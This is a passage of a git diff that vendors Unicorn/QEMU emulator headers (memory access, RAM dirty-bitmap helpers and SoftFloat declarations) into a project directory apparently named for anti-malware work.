+ * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @buf: buffer with the data transferred + * @is_write: indicates the transfer direction + */ +bool address_space_rw(AddressSpace *as, hwaddr addr, uint8_t *buf, + int len, bool is_write); + +/** + * address_space_write: write to address space. + * + * Return true if the operation hit any unassigned memory or encountered an + * IOMMU fault. + * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @buf: buffer with the data transferred + */ +bool address_space_write(AddressSpace *as, hwaddr addr, + const uint8_t *buf, int len); + +/** + * address_space_read: read from an address space. + * + * Return true if the operation hit any unassigned memory or encountered an + * IOMMU fault. + * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @buf: buffer with the data transferred + */ +bool address_space_read(AddressSpace *as, hwaddr addr, uint8_t *buf, int len); + +/* address_space_translate: translate an address range into an address space + * into a MemoryRegion and an address range into that section + * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @xlat: pointer to address within the returned memory region section's + * #MemoryRegion. + * @len: pointer to length + * @is_write: indicates the transfer direction + */ +MemoryRegion *address_space_translate(AddressSpace *as, hwaddr addr, + hwaddr *xlat, hwaddr *len, + bool is_write); + +/* address_space_access_valid: check for validity of accessing an address + * space range + * + * Check whether memory is assigned to the given address space range, and + * access is permitted by any IOMMU regions that are active for the address + * space. + * + * For now, addr and len should be aligned to a page size. This limitation + * will be lifted in the future. 
+ * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @len: length of the area to be checked + * @is_write: indicates the transfer direction + */ +bool address_space_access_valid(AddressSpace *as, hwaddr addr, int len, bool is_write); + +/* address_space_map: map a physical memory region into a host virtual address + * + * May map a subset of the requested range, given by and returned in @plen. + * May return %NULL if resources needed to perform the mapping are exhausted. + * Use only for reads OR writes - not for read-modify-write operations. + * Use cpu_register_map_client() to know when retrying the map operation is + * likely to succeed. + * + * @as: #AddressSpace to be accessed + * @addr: address within that address space + * @plen: pointer to length of buffer; updated on return + * @is_write: indicates the transfer direction + */ +void *address_space_map(AddressSpace *as, hwaddr addr, + hwaddr *plen, bool is_write); + +/* address_space_unmap: Unmaps a memory region previously mapped by address_space_map() + * + * Will also mark the memory as dirty if @is_write == %true. @access_len gives + * the amount of memory that was actually read or written by the caller. 
+ * + * @as: #AddressSpace used + * @addr: address within that address space + * @len: buffer length as returned by address_space_map() + * @access_len: amount of data actually transferred + * @is_write: indicates the transfer direction + */ +void address_space_unmap(AddressSpace *as, void *buffer, hwaddr len, + int is_write, hwaddr access_len); + + +void memory_register_types(struct uc_struct *uc); + +MemoryRegion *memory_map(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms); +MemoryRegion *memory_map_ptr(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms, void *ptr); +void memory_unmap(struct uc_struct *uc, MemoryRegion *mr); +int memory_free(struct uc_struct *uc); + +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ram_addr.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ram_addr.h new file mode 100644 index 0000000..5e614e5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/ram_addr.h @@ -0,0 +1,163 @@ +/* + * Declarations for cpu physical memory functions + * + * Copyright 2011 Red Hat, Inc. and/or its affiliates + * + * Authors: + * Avi Kivity <avi@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2 or + * later. See the COPYING file in the top-level directory. + * + */ + +/* + * This header is for use by exec.c and memory.c ONLY. Do not include it. + * The functions declared here will be removed soon. 
+ */ + +#ifndef RAM_ADDR_H +#define RAM_ADDR_H + +#include "uc_priv.h" + +#ifndef CONFIG_USER_ONLY + +ram_addr_t qemu_ram_alloc_from_ptr(ram_addr_t size, void *host, + MemoryRegion *mr, Error **errp); +ram_addr_t qemu_ram_alloc(ram_addr_t size, MemoryRegion *mr, Error **errp); +int qemu_get_ram_fd(struct uc_struct *uc, ram_addr_t addr); +void *qemu_get_ram_block_host_ptr(struct uc_struct *uc, ram_addr_t addr); +void *qemu_get_ram_ptr(struct uc_struct *uc, ram_addr_t addr); +void qemu_ram_free(struct uc_struct *c, ram_addr_t addr); +void qemu_ram_free_from_ptr(struct uc_struct *uc, ram_addr_t addr); + +static inline bool cpu_physical_memory_get_dirty(struct uc_struct *uc, ram_addr_t start, + ram_addr_t length, + unsigned client) +{ + unsigned long end, page, next; + + assert(client < DIRTY_MEMORY_NUM); + + end = TARGET_PAGE_ALIGN(start + length) >> TARGET_PAGE_BITS; + page = start >> TARGET_PAGE_BITS; + next = find_next_bit(uc->ram_list.dirty_memory[client], end, page); + + return next < end; +} + +static inline bool cpu_physical_memory_get_clean(struct uc_struct *uc, ram_addr_t start, + ram_addr_t length, + unsigned client) +{ + unsigned long end, page, next; + + assert(client < DIRTY_MEMORY_NUM); + + end = TARGET_PAGE_ALIGN(start + length) >> TARGET_PAGE_BITS; + page = start >> TARGET_PAGE_BITS; + next = find_next_zero_bit(uc->ram_list.dirty_memory[client], end, page); + + return next < end; +} + +static inline bool cpu_physical_memory_get_dirty_flag(struct uc_struct *uc, ram_addr_t addr, + unsigned client) +{ + return cpu_physical_memory_get_dirty(uc, addr, 1, client); +} + +static inline bool cpu_physical_memory_is_clean(struct uc_struct *uc, ram_addr_t addr) +{ + return !cpu_physical_memory_get_dirty_flag(uc, addr, DIRTY_MEMORY_CODE); +} + +static inline bool cpu_physical_memory_range_includes_clean(struct uc_struct *uc, ram_addr_t start, + ram_addr_t length) +{ + return cpu_physical_memory_get_clean(uc, start, length, DIRTY_MEMORY_CODE); +} + +static inline 
void cpu_physical_memory_set_dirty_flag(struct uc_struct *uc, ram_addr_t addr, + unsigned client) +{ + assert(client < DIRTY_MEMORY_NUM); + set_bit(addr >> TARGET_PAGE_BITS, uc->ram_list.dirty_memory[client]); +} + +static inline void cpu_physical_memory_set_dirty_range(struct uc_struct *uc, ram_addr_t start, + ram_addr_t length) +{ + unsigned long end, page; + + end = TARGET_PAGE_ALIGN(start + length) >> TARGET_PAGE_BITS; + page = start >> TARGET_PAGE_BITS; + qemu_bitmap_set(uc->ram_list.dirty_memory[DIRTY_MEMORY_CODE], page, end - page); +} + +#if !defined(_WIN32) +static inline void cpu_physical_memory_set_dirty_lebitmap(struct uc_struct *uc, unsigned long *bitmap, + ram_addr_t start, + ram_addr_t pages) +{ + unsigned long i, j; + unsigned long page_number, c; + hwaddr addr; + ram_addr_t ram_addr; + unsigned long len = (pages + HOST_LONG_BITS - 1) / HOST_LONG_BITS; + unsigned long hpratio = getpagesize() / TARGET_PAGE_SIZE; + unsigned long page = BIT_WORD(start >> TARGET_PAGE_BITS); + + /* start address is aligned at the start of a word? */ + if ((((page * BITS_PER_LONG) << TARGET_PAGE_BITS) == start) && + (hpratio == 1)) { + long k; + long nr = BITS_TO_LONGS(pages); + + for (k = 0; k < nr; k++) { + if (bitmap[k]) { + unsigned long temp = leul_to_cpu(bitmap[k]); + uc->ram_list.dirty_memory[DIRTY_MEMORY_CODE][page + k] |= temp; + } + } + } else { + /* + * bitmap-traveling is faster than memory-traveling (for addr...) + * especially when most of the memory is not dirty. 
+ */ + for (i = 0; i < len; i++) { + if (bitmap[i] != 0) { + c = leul_to_cpu(bitmap[i]); + do { + j = ctzl(c); + c &= ~(1ul << j); + page_number = (i * HOST_LONG_BITS + j) * hpratio; + addr = page_number * TARGET_PAGE_SIZE; + ram_addr = start + addr; + cpu_physical_memory_set_dirty_range(uc, ram_addr, + TARGET_PAGE_SIZE * hpratio); + } while (c != 0); + } + } + } +} +#endif /* not _WIN32 */ + +static inline void cpu_physical_memory_clear_dirty_range(struct uc_struct *uc, ram_addr_t start, + ram_addr_t length, + unsigned client) +{ + unsigned long end, page; + + assert(client < DIRTY_MEMORY_NUM); + end = TARGET_PAGE_ALIGN(start + length) >> TARGET_PAGE_BITS; + page = start >> TARGET_PAGE_BITS; + qemu_bitmap_clear(uc->ram_list.dirty_memory[client], page, end - page); +} + +void cpu_physical_memory_reset_dirty(struct uc_struct *uc, + ram_addr_t start, ram_addr_t length, unsigned client); + +#endif +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/fpu/softfloat.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/fpu/softfloat.h new file mode 100644 index 0000000..d15678d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/fpu/softfloat.h @@ -0,0 +1,741 @@ +/* + * QEMU float support + * + * Derived from SoftFloat. + */ + +/*============================================================================ + +This C header file is part of the SoftFloat IEC/IEEE Floating-point Arithmetic +Package, Release 2b. + +Written by John R. Hauser. This work was made possible in part by the +International Computer Science Institute, located at Suite 600, 1947 Center +Street, Berkeley, California 94704. Funding was partially provided by the +National Science Foundation under grant MIP-9311980. The original version +of this code was written as part of a project to build a fixed-point vector +processor in collaboration with the University of California at Berkeley, +overseen by Profs. Nelson Morgan and John Wawrzynek. 
More information +is available through the Web page `http://www.cs.berkeley.edu/~jhauser/ +arithmetic/SoftFloat.html'. + +THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has +been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES +RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS +AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ALL LOSSES, +COSTS, OR OTHER PROBLEMS THEY INCUR DUE TO THE SOFTWARE, AND WHO FURTHERMORE +EFFECTIVELY INDEMNIFY JOHN HAUSER AND THE INTERNATIONAL COMPUTER SCIENCE +INSTITUTE (possibly via similar legal warning) AGAINST ALL LOSSES, COSTS, OR +OTHER PROBLEMS INCURRED BY THEIR CUSTOMERS AND CLIENTS DUE TO THE SOFTWARE. + +Derivative works are acceptable, even for commercial purposes, so long as +(1) the source code for the derivative work includes prominent notice that +the work is derivative, and (2) the source code includes prominent notice with +these four paragraphs for those parts of this code that are retained. + +=============================================================================*/ + +#ifndef SOFTFLOAT_H +#define SOFTFLOAT_H + +#if defined(CONFIG_SOLARIS) && defined(CONFIG_NEEDS_LIBSUNMATH) +#include <sunmath.h> +#endif + +#include "unicorn/platform.h" +#include "config-host.h" +#include "qemu/osdep.h" + +/*---------------------------------------------------------------------------- +| Each of the following `typedef's defines the most convenient type that holds +| integers of at least as many bits as specified. For example, `uint8' should +| be the most convenient type that can hold unsigned integers of as many as +| 8 bits. The `flag' type must be able to hold either a 0 or 1. For most +| implementations of C, `flag', `uint8', and `int8' should all be `typedef'ed +| to the same as `int'. 
+*----------------------------------------------------------------------------*/ +typedef uint8_t flag; +typedef uint8_t uint8; +typedef int8_t int8; +typedef unsigned int uint32; +typedef signed int int32; +typedef uint64_t uint64; +typedef int64_t int64; + +#define LIT64( a ) a##LL + +#define STATUS_PARAM , float_status *status +#define STATUS(field) status->field +#define STATUS_VAR , status + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE floating-point ordering relations +*----------------------------------------------------------------------------*/ +enum { + float_relation_less = -1, + float_relation_equal = 0, + float_relation_greater = 1, + float_relation_unordered = 2 +}; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE floating-point types. +*----------------------------------------------------------------------------*/ +/* Use structures for soft-float types. This prevents accidentally mixing + them with native int/float types. A sufficiently clever compiler and + sane ABI should be able to see though these structs. However + x86/gcc 3.x seems to struggle a bit, so leave them disabled by default. */ +//#define USE_SOFTFLOAT_STRUCT_TYPES +#ifdef USE_SOFTFLOAT_STRUCT_TYPES +typedef struct { + uint16_t v; +} float16; +#define float16_val(x) (((float16)(x)).v) +#define make_float16(x) __extension__ ({ float16 f16_val = {x}; f16_val; }) +#define const_float16(x) { x } +typedef struct { + uint32_t v; +} float32; +/* The cast ensures an error if the wrong type is passed. 
*/ +#define float32_val(x) (((float32)(x)).v) +#define make_float32(x) __extension__ ({ float32 f32_val = {x}; f32_val; }) +#define const_float32(x) { x } +typedef struct { + uint64_t v; +} float64; +#define float64_val(x) (((float64)(x)).v) +#define make_float64(x) __extension__ ({ float64 f64_val = {x}; f64_val; }) +#define const_float64(x) { x } +#else +typedef uint16_t float16; +typedef uint32_t float32; +typedef uint64_t float64; +#define float16_val(x) (x) +#define float32_val(x) (x) +#define float64_val(x) (x) +#define make_float16(x) (x) +#define make_float32(x) (x) +#define make_float64(x) (x) +#define const_float16(x) (x) +#define const_float32(x) (x) +#define const_float64(x) (x) +#endif +typedef struct { + uint64_t low; + uint16_t high; +} floatx80; +#define make_floatx80(exp, mant) ((floatx80) { mant, exp }) +#define make_floatx80_init(exp, mant) { mant, exp } +typedef struct { +#ifdef HOST_WORDS_BIGENDIAN + uint64_t high, low; +#else + uint64_t low, high; +#endif +} float128; +#ifdef HOST_WORDS_BIGENDIAN +#define make_float128(high_, low_) ((float128) { high_, low_ }) +#define make_float128_init(high_, low_) { high_, low_ } +#else +#define make_float128(high_, low_) ((float128) { low_, high_ }) +#define make_float128_init(high_, low_) { low_, high_ } +#endif + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE floating-point underflow tininess-detection mode. +*----------------------------------------------------------------------------*/ +enum { + float_tininess_after_rounding = 0, + float_tininess_before_rounding = 1 +}; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE floating-point rounding mode. 
+*----------------------------------------------------------------------------*/ +enum { + float_round_nearest_even = 0, + float_round_down = 1, + float_round_up = 2, + float_round_to_zero = 3, + float_round_ties_away = 4, +}; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE floating-point exception flags. +*----------------------------------------------------------------------------*/ +enum { + float_flag_invalid = 1, + float_flag_divbyzero = 4, + float_flag_overflow = 8, + float_flag_underflow = 16, + float_flag_inexact = 32, + float_flag_input_denormal = 64, + float_flag_output_denormal = 128 +}; + +typedef struct float_status { + signed char float_detect_tininess; + signed char float_rounding_mode; + signed char float_exception_flags; + signed char floatx80_rounding_precision; + /* should denormalised results go to zero and set the inexact flag? */ + flag flush_to_zero; + /* should denormalised inputs go to zero and set the input_denormal flag? 
*/ + flag flush_inputs_to_zero; + flag default_nan_mode; +} float_status; + +static inline void set_float_detect_tininess(int val STATUS_PARAM) +{ + STATUS(float_detect_tininess) = val; +} +static inline void set_float_rounding_mode(int val STATUS_PARAM) +{ + STATUS(float_rounding_mode) = val; +} +static inline void set_float_exception_flags(int val STATUS_PARAM) +{ + STATUS(float_exception_flags) = val; +} +static inline void set_floatx80_rounding_precision(int val STATUS_PARAM) +{ + STATUS(floatx80_rounding_precision) = val; +} +static inline void set_flush_to_zero(flag val STATUS_PARAM) +{ + STATUS(flush_to_zero) = val; +} +static inline void set_flush_inputs_to_zero(flag val STATUS_PARAM) +{ + STATUS(flush_inputs_to_zero) = val; +} +static inline void set_default_nan_mode(flag val STATUS_PARAM) +{ + STATUS(default_nan_mode) = val; +} +static inline int get_float_detect_tininess(float_status *status) +{ + return STATUS(float_detect_tininess); +} +static inline int get_float_rounding_mode(float_status *status) +{ + return STATUS(float_rounding_mode); +} +static inline int get_float_exception_flags(float_status *status) +{ + return STATUS(float_exception_flags); +} +static inline int get_floatx80_rounding_precision(float_status *status) +{ + return STATUS(floatx80_rounding_precision); +} +static inline flag get_flush_to_zero(float_status *status) +{ + return STATUS(flush_to_zero); +} +static inline flag get_flush_inputs_to_zero(float_status *status) +{ + return STATUS(flush_inputs_to_zero); +} +static inline flag get_default_nan_mode(float_status *status) +{ + return STATUS(default_nan_mode); +} + +/*---------------------------------------------------------------------------- +| Routine to raise any or all of the software IEC/IEEE floating-point +| exception flags. 
+*----------------------------------------------------------------------------*/ +void float_raise( uint8_t flags STATUS_PARAM); + +/*---------------------------------------------------------------------------- +| If `a' is denormal and we are in flush-to-zero mode then set the +| input-denormal exception and return zero. Otherwise just return the value. +*----------------------------------------------------------------------------*/ +float32 float32_squash_input_denormal(float32 a STATUS_PARAM); +float64 float64_squash_input_denormal(float64 a STATUS_PARAM); + +/*---------------------------------------------------------------------------- +| Options to indicate which negations to perform in float*_muladd() +| Using these differs from negating an input or output before calling +| the muladd function in that this means that a NaN doesn't have its +| sign bit inverted before it is propagated. +| We also support halving the result before rounding, as a special +| case to support the ARM fused-sqrt-step instruction FRSQRTS. +*----------------------------------------------------------------------------*/ +enum { + float_muladd_negate_c = 1, + float_muladd_negate_product = 2, + float_muladd_negate_result = 4, + float_muladd_halve_result = 8, +}; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE integer-to-floating-point conversion routines. 
+*----------------------------------------------------------------------------*/ +float32 int32_to_float32(int32_t STATUS_PARAM); +float64 int32_to_float64(int32_t STATUS_PARAM); +float32 uint32_to_float32(uint32_t STATUS_PARAM); +float64 uint32_to_float64(uint32_t STATUS_PARAM); +floatx80 int32_to_floatx80(int32_t STATUS_PARAM); +float128 int32_to_float128(int32_t STATUS_PARAM); +float32 int64_to_float32(int64_t STATUS_PARAM); +float32 uint64_to_float32(uint64_t STATUS_PARAM); +float64 int64_to_float64(int64_t STATUS_PARAM); +float64 uint64_to_float64(uint64_t STATUS_PARAM); +floatx80 int64_to_floatx80(int64_t STATUS_PARAM); +float128 int64_to_float128(int64_t STATUS_PARAM); +float128 uint64_to_float128(uint64_t STATUS_PARAM); + +/* We provide the int16 versions for symmetry of API with float-to-int */ +static inline float32 int16_to_float32(int16_t v STATUS_PARAM) +{ + return int32_to_float32(v STATUS_VAR); +} + +static inline float32 uint16_to_float32(uint16_t v STATUS_PARAM) +{ + return uint32_to_float32(v STATUS_VAR); +} + +static inline float64 int16_to_float64(int16_t v STATUS_PARAM) +{ + return int32_to_float64(v STATUS_VAR); +} + +static inline float64 uint16_to_float64(uint16_t v STATUS_PARAM) +{ + return uint32_to_float64(v STATUS_VAR); +} + +/*---------------------------------------------------------------------------- +| Software half-precision conversion routines. +*----------------------------------------------------------------------------*/ +float16 float32_to_float16( float32, flag STATUS_PARAM ); +float32 float16_to_float32( float16, flag STATUS_PARAM ); +float16 float64_to_float16(float64 a, flag ieee STATUS_PARAM); +float64 float16_to_float64(float16 a, flag ieee STATUS_PARAM); + +/*---------------------------------------------------------------------------- +| Software half-precision operations. 
+*----------------------------------------------------------------------------*/ +int float16_is_quiet_nan( float16 ); +int float16_is_signaling_nan( float16 ); +float16 float16_maybe_silence_nan( float16 ); + +static inline int float16_is_any_nan(float16 a) +{ + return ((float16_val(a) & ~0x8000) > 0x7c00); +} + +/*---------------------------------------------------------------------------- +| The pattern for a default generated half-precision NaN. +*----------------------------------------------------------------------------*/ +extern const float16 float16_default_nan; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE single-precision conversion routines. +*----------------------------------------------------------------------------*/ +int_fast16_t float32_to_int16(float32 STATUS_PARAM); +uint_fast16_t float32_to_uint16(float32 STATUS_PARAM); +int_fast16_t float32_to_int16_round_to_zero(float32 STATUS_PARAM); +uint_fast16_t float32_to_uint16_round_to_zero(float32 STATUS_PARAM); +int32 float32_to_int32( float32 STATUS_PARAM ); +int32 float32_to_int32_round_to_zero( float32 STATUS_PARAM ); +uint32 float32_to_uint32( float32 STATUS_PARAM ); +uint32 float32_to_uint32_round_to_zero( float32 STATUS_PARAM ); +int64 float32_to_int64( float32 STATUS_PARAM ); +uint64 float32_to_uint64(float32 STATUS_PARAM); +uint64 float32_to_uint64_round_to_zero(float32 STATUS_PARAM); +int64 float32_to_int64_round_to_zero( float32 STATUS_PARAM ); +float64 float32_to_float64( float32 STATUS_PARAM ); +floatx80 float32_to_floatx80( float32 STATUS_PARAM ); +float128 float32_to_float128( float32 STATUS_PARAM ); + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE single-precision operations. 
+*----------------------------------------------------------------------------*/ +float32 float32_round_to_int( float32 STATUS_PARAM ); +float32 float32_add( float32, float32 STATUS_PARAM ); +float32 float32_sub( float32, float32 STATUS_PARAM ); +float32 float32_mul( float32, float32 STATUS_PARAM ); +float32 float32_div( float32, float32 STATUS_PARAM ); +float32 float32_rem( float32, float32 STATUS_PARAM ); +float32 float32_muladd(float32, float32, float32, int STATUS_PARAM); +float32 float32_sqrt( float32 STATUS_PARAM ); +float32 float32_exp2( float32 STATUS_PARAM ); +float32 float32_log2( float32 STATUS_PARAM ); +int float32_eq( float32, float32 STATUS_PARAM ); +int float32_le( float32, float32 STATUS_PARAM ); +int float32_lt( float32, float32 STATUS_PARAM ); +int float32_unordered( float32, float32 STATUS_PARAM ); +int float32_eq_quiet( float32, float32 STATUS_PARAM ); +int float32_le_quiet( float32, float32 STATUS_PARAM ); +int float32_lt_quiet( float32, float32 STATUS_PARAM ); +int float32_unordered_quiet( float32, float32 STATUS_PARAM ); +int float32_compare( float32, float32 STATUS_PARAM ); +int float32_compare_quiet( float32, float32 STATUS_PARAM ); +float32 float32_min(float32, float32 STATUS_PARAM); +float32 float32_max(float32, float32 STATUS_PARAM); +float32 float32_minnum(float32, float32 STATUS_PARAM); +float32 float32_maxnum(float32, float32 STATUS_PARAM); +float32 float32_minnummag(float32, float32 STATUS_PARAM); +float32 float32_maxnummag(float32, float32 STATUS_PARAM); +int float32_is_quiet_nan( float32 ); +int float32_is_signaling_nan( float32 ); +float32 float32_maybe_silence_nan( float32 ); +float32 float32_scalbn( float32, int STATUS_PARAM ); + +static inline float32 float32_abs(float32 a) +{ + /* Note that abs does *not* handle NaN specially, nor does + * it flush denormal inputs to zero. 
+ */ + return make_float32(float32_val(a) & 0x7fffffff); +} + +static inline float32 float32_chs(float32 a) +{ + /* Note that chs does *not* handle NaN specially, nor does + * it flush denormal inputs to zero. + */ + return make_float32(float32_val(a) ^ 0x80000000); +} + +static inline int float32_is_infinity(float32 a) +{ + return (float32_val(a) & 0x7fffffff) == 0x7f800000; +} + +static inline int float32_is_neg(float32 a) +{ + return float32_val(a) >> 31; +} + +static inline int float32_is_zero(float32 a) +{ + return (float32_val(a) & 0x7fffffff) == 0; +} + +static inline int float32_is_any_nan(float32 a) +{ + return ((float32_val(a) & ~(1U << 31)) > 0x7f800000UL); +} + +static inline int float32_is_zero_or_denormal(float32 a) +{ + return (float32_val(a) & 0x7f800000) == 0; +} + +static inline float32 float32_set_sign(float32 a, int sign) +{ + return make_float32((float32_val(a) & 0x7fffffff) | (sign << 31)); +} + +#define float32_zero make_float32(0) +#define float32_one make_float32(0x3f800000) +#define float32_ln2 make_float32(0x3f317218) +#define float32_pi make_float32(0x40490fdb) +#define float32_half make_float32(0x3f000000) +#define float32_infinity make_float32(0x7f800000) + + +/*---------------------------------------------------------------------------- +| The pattern for a default generated single-precision NaN. +*----------------------------------------------------------------------------*/ +extern const float32 float32_default_nan; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE double-precision conversion routines. 
+*----------------------------------------------------------------------------*/ +int_fast16_t float64_to_int16(float64 STATUS_PARAM); +uint_fast16_t float64_to_uint16(float64 STATUS_PARAM); +int_fast16_t float64_to_int16_round_to_zero(float64 STATUS_PARAM); +uint_fast16_t float64_to_uint16_round_to_zero(float64 STATUS_PARAM); +int32 float64_to_int32( float64 STATUS_PARAM ); +int32 float64_to_int32_round_to_zero( float64 STATUS_PARAM ); +uint32 float64_to_uint32( float64 STATUS_PARAM ); +uint32 float64_to_uint32_round_to_zero( float64 STATUS_PARAM ); +int64 float64_to_int64( float64 STATUS_PARAM ); +int64 float64_to_int64_round_to_zero( float64 STATUS_PARAM ); +uint64 float64_to_uint64 (float64 a STATUS_PARAM); +uint64 float64_to_uint64_round_to_zero (float64 a STATUS_PARAM); +float32 float64_to_float32( float64 STATUS_PARAM ); +floatx80 float64_to_floatx80( float64 STATUS_PARAM ); +float128 float64_to_float128( float64 STATUS_PARAM ); + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE double-precision operations. 
+*----------------------------------------------------------------------------*/ +float64 float64_round_to_int( float64 STATUS_PARAM ); +float64 float64_trunc_to_int( float64 STATUS_PARAM ); +float64 float64_add( float64, float64 STATUS_PARAM ); +float64 float64_sub( float64, float64 STATUS_PARAM ); +float64 float64_mul( float64, float64 STATUS_PARAM ); +float64 float64_div( float64, float64 STATUS_PARAM ); +float64 float64_rem( float64, float64 STATUS_PARAM ); +float64 float64_muladd(float64, float64, float64, int STATUS_PARAM); +float64 float64_sqrt( float64 STATUS_PARAM ); +float64 float64_log2( float64 STATUS_PARAM ); +int float64_eq( float64, float64 STATUS_PARAM ); +int float64_le( float64, float64 STATUS_PARAM ); +int float64_lt( float64, float64 STATUS_PARAM ); +int float64_unordered( float64, float64 STATUS_PARAM ); +int float64_eq_quiet( float64, float64 STATUS_PARAM ); +int float64_le_quiet( float64, float64 STATUS_PARAM ); +int float64_lt_quiet( float64, float64 STATUS_PARAM ); +int float64_unordered_quiet( float64, float64 STATUS_PARAM ); +int float64_compare( float64, float64 STATUS_PARAM ); +int float64_compare_quiet( float64, float64 STATUS_PARAM ); +float64 float64_min(float64, float64 STATUS_PARAM); +float64 float64_max(float64, float64 STATUS_PARAM); +float64 float64_minnum(float64, float64 STATUS_PARAM); +float64 float64_maxnum(float64, float64 STATUS_PARAM); +float64 float64_minnummag(float64, float64 STATUS_PARAM); +float64 float64_maxnummag(float64, float64 STATUS_PARAM); +int float64_is_quiet_nan( float64 a ); +int float64_is_signaling_nan( float64 ); +float64 float64_maybe_silence_nan( float64 ); +float64 float64_scalbn( float64, int STATUS_PARAM ); + +static inline float64 float64_abs(float64 a) +{ + /* Note that abs does *not* handle NaN specially, nor does + * it flush denormal inputs to zero. 
+ */ + return make_float64(float64_val(a) & 0x7fffffffffffffffLL); +} + +static inline float64 float64_chs(float64 a) +{ + /* Note that chs does *not* handle NaN specially, nor does + * it flush denormal inputs to zero. + */ + return make_float64(float64_val(a) ^ 0x8000000000000000LL); +} + +static inline int float64_is_infinity(float64 a) +{ + return (float64_val(a) & 0x7fffffffffffffffLL ) == 0x7ff0000000000000LL; +} + +static inline int float64_is_neg(float64 a) +{ + return float64_val(a) >> 63; +} + +static inline int float64_is_zero(float64 a) +{ + return (float64_val(a) & 0x7fffffffffffffffLL) == 0; +} + +static inline int float64_is_any_nan(float64 a) +{ + return ((float64_val(a) & ~(1ULL << 63)) > 0x7ff0000000000000ULL); +} + +static inline int float64_is_zero_or_denormal(float64 a) +{ + return (float64_val(a) & 0x7ff0000000000000LL) == 0; +} + +static inline float64 float64_set_sign(float64 a, int sign) +{ + return make_float64((float64_val(a) & 0x7fffffffffffffffULL) + | ((int64_t)sign << 63)); +} + +#define float64_zero make_float64(0) +#define float64_one make_float64(0x3ff0000000000000LL) +#define float64_ln2 make_float64(0x3fe62e42fefa39efLL) +#define float64_pi make_float64(0x400921fb54442d18LL) +#define float64_half make_float64(0x3fe0000000000000LL) +#define float64_infinity make_float64(0x7ff0000000000000LL) + +/*---------------------------------------------------------------------------- +| The pattern for a default generated double-precision NaN. +*----------------------------------------------------------------------------*/ +extern const float64 float64_default_nan; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE extended double-precision conversion routines. 
+*----------------------------------------------------------------------------*/ +int32 floatx80_to_int32( floatx80 STATUS_PARAM ); +int32 floatx80_to_int32_round_to_zero( floatx80 STATUS_PARAM ); +int64 floatx80_to_int64( floatx80 STATUS_PARAM ); +int64 floatx80_to_int64_round_to_zero( floatx80 STATUS_PARAM ); +float32 floatx80_to_float32( floatx80 STATUS_PARAM ); +float64 floatx80_to_float64( floatx80 STATUS_PARAM ); +float128 floatx80_to_float128( floatx80 STATUS_PARAM ); + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE extended double-precision operations. +*----------------------------------------------------------------------------*/ +floatx80 floatx80_round_to_int( floatx80 STATUS_PARAM ); +floatx80 floatx80_add( floatx80, floatx80 STATUS_PARAM ); +floatx80 floatx80_sub( floatx80, floatx80 STATUS_PARAM ); +floatx80 floatx80_mul( floatx80, floatx80 STATUS_PARAM ); +floatx80 floatx80_div( floatx80, floatx80 STATUS_PARAM ); +floatx80 floatx80_rem( floatx80, floatx80 STATUS_PARAM ); +floatx80 floatx80_sqrt( floatx80 STATUS_PARAM ); +int floatx80_eq( floatx80, floatx80 STATUS_PARAM ); +int floatx80_le( floatx80, floatx80 STATUS_PARAM ); +int floatx80_lt( floatx80, floatx80 STATUS_PARAM ); +int floatx80_unordered( floatx80, floatx80 STATUS_PARAM ); +int floatx80_eq_quiet( floatx80, floatx80 STATUS_PARAM ); +int floatx80_le_quiet( floatx80, floatx80 STATUS_PARAM ); +int floatx80_lt_quiet( floatx80, floatx80 STATUS_PARAM ); +int floatx80_unordered_quiet( floatx80, floatx80 STATUS_PARAM ); +int floatx80_compare( floatx80, floatx80 STATUS_PARAM ); +int floatx80_compare_quiet( floatx80, floatx80 STATUS_PARAM ); +int floatx80_is_quiet_nan( floatx80 ); +int floatx80_is_signaling_nan( floatx80 ); +floatx80 floatx80_maybe_silence_nan( floatx80 ); +floatx80 floatx80_scalbn( floatx80, int STATUS_PARAM ); + +static inline floatx80 floatx80_abs(floatx80 a) +{ + a.high &= 0x7fff; + return a; +} + +static inline floatx80 
